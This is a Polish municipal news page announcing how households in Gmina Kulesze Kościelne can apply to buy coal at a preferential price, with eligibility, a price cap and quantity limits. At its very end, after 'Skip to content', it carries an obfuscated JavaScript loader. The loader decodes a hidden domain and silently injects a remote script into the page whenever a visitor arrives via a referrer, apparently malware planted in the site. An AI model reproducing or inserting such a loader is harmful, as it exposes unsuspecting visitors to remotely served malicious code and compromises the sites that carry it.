Aktualności

Ogłoszenie o możliwości składania wniosków o zakup preferencyjny paliwa stałego dla gospodarstw domowych w Gminie Kulesze Kościelne.

lis 9, 2022 | Aktualności

W związku z przystąpieniem Gminy Kulesze Kościelne do programu zakupu preferencyjnego paliwa stałego dla gospodarstw domowych zlokalizowanych na terenie Gminy  informuję, iż wnioski o zakup preferencyjny węgla można składać w Ośrodku Pomocy Społecznej w Kuleszach Kościelnych, ul. Główna 6, nr tel. 86 476 90 10 wew. 24.

Wniosek należy złożyć osobiście lub drogą elektroniczną poprzez platformę ePUAP.
W przypadku złożenia wniosku drogą elektroniczną wniosek o zakup opatruje
się kwalifikowanym podpisem elektronicznym lub podpisem zaufanym.

Informujemy, że mieszkańcy którzy wyrazili wstępną wolę zakupu paliwa stałego telefonicznie lub osobiście w Urzędzie Gminy też muszą złożyć wniosek o zakup preferencyjny.

Jednocześnie przypominam, iż do dokonania zakupu preferencyjnego jest uprawniona osoba fizyczna w gospodarstwie domowym, która spełnia warunki uprawniające do dodatku węglowego.

Cena paliwa stałego w ramach zakupu preferencyjnego wynosić będzie do 2000,00 zł brutto za tonę paliwa stałego.

Maksymalna ilość paliwa stałego dostępna dla jednego gospodarstwa domowego w ramach zakupu preferencyjnego wynosić może:

  • 1500 kg do dnia 31 grudnia 2022 r.,
  • 1500 kg od dnia 1 stycznia 2023 r. do dnia 30 kwietnia 2023 r.
Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);